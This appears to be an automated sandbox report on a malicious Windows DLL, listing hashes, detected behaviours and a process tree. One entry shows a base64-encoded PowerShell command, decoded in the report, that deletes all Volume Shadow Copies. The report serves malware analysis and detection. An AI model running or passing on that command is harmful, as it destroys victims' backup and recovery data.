Analysis

  max time kernel:   91s
  max time network:  155s
  platform:          windows10-2004_x64
  resource:          win10v2004-20220414-en
  submitted:         24-05-2022 03:35

  Static task: static1

  Behavioral task: behavioral1
    Sample:   9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll
    Resource: win7-20220414-en

  Behavioral task: behavioral2
    Sample:   9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll
    Resource: win10v2004-20220414-en
General

  Target: 9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll
  Size:   164KB
  MD5:    f45b3caa097afbdd50358ede4042a88f
  SHA1:   685757998c553c84433410423daf9d5c9b6068c4
  SHA256: 9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148
  SHA512: bf33d5439e01bece4efd21f356fa8619d0dc5dcb72e0c7366c6c3e82f8a909233281633a2cb67e7f92518d6e1dd374961dbfe0a07277a234f33f0bf623620c1f
Malware Config
Signatures

- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
    description              ioc     process
    File opened (read-only)  \??\E:  rundll32.exe
    File opened (read-only)  \??\F:  rundll32.exe
    File opened (read-only)  \??\N:  rundll32.exe
    File opened (read-only)  \??\Q:  rundll32.exe
    File opened (read-only)  \??\T:  rundll32.exe
    File opened (read-only)  \??\G:  rundll32.exe
    File opened (read-only)  \??\I:  rundll32.exe
    File opened (read-only)  \??\M:  rundll32.exe
    File opened (read-only)  \??\O:  rundll32.exe
    File opened (read-only)  \??\P:  rundll32.exe
    File opened (read-only)  \??\S:  rundll32.exe
    File opened (read-only)  \??\X:  rundll32.exe
    File opened (read-only)  \??\B:  rundll32.exe
    File opened (read-only)  \??\H:  rundll32.exe
    File opened (read-only)  \??\J:  rundll32.exe
    File opened (read-only)  \??\L:  rundll32.exe
    File opened (read-only)  \??\R:  rundll32.exe
    File opened (read-only)  \??\V:  rundll32.exe
    File opened (read-only)  \??\W:  rundll32.exe
    File opened (read-only)  \??\Y:  rundll32.exe
    File opened (read-only)  \??\Z:  rundll32.exe
    File opened (read-only)  \??\A:  rundll32.exe
    File opened (read-only)  \??\K:  rundll32.exe
    File opened (read-only)  \??\U:  rundll32.exe

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid   process
    2008  rundll32.exe
    2008  rundll32.exe
    4740  powershell.exe
    4740  powershell.exe

- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
    description                pid   process
    Token: SeDebugPrivilege    4740  powershell.exe
    Token: SeBackupPrivilege   2196  vssvc.exe
    Token: SeRestorePrivilege  2196  vssvc.exe
    Token: SeAuditPrivilege    2196  vssvc.exe

- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes:
    description                        pid   process       target process
    PID 5012 wrote to memory of 2008   5012  rundll32.exe  rundll32.exe
    PID 5012 wrote to memory of 2008   5012  rundll32.exe  rundll32.exe
    PID 5012 wrote to memory of 2008   5012  rundll32.exe  rundll32.exe
    PID 2008 wrote to memory of 4740   2008  rundll32.exe  powershell.exe
    PID 2008 wrote to memory of 4740   2008  rundll32.exe  powershell.exe
Processes

- [depth 1] C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll,#1
  Signatures:
    - Suspicious use of WriteProcessMemory

  - [depth 2] C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll,#1
    Signatures:
      - Enumerates connected drives
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

    - [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is a base64-encoded UTF-16LE script; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which deletes all Volume Shadow Copies and explains the vssvc.exe activity below.)
      Signatures:
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

- [depth 1] C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
    - Suspicious use of AdjustPrivilegeToken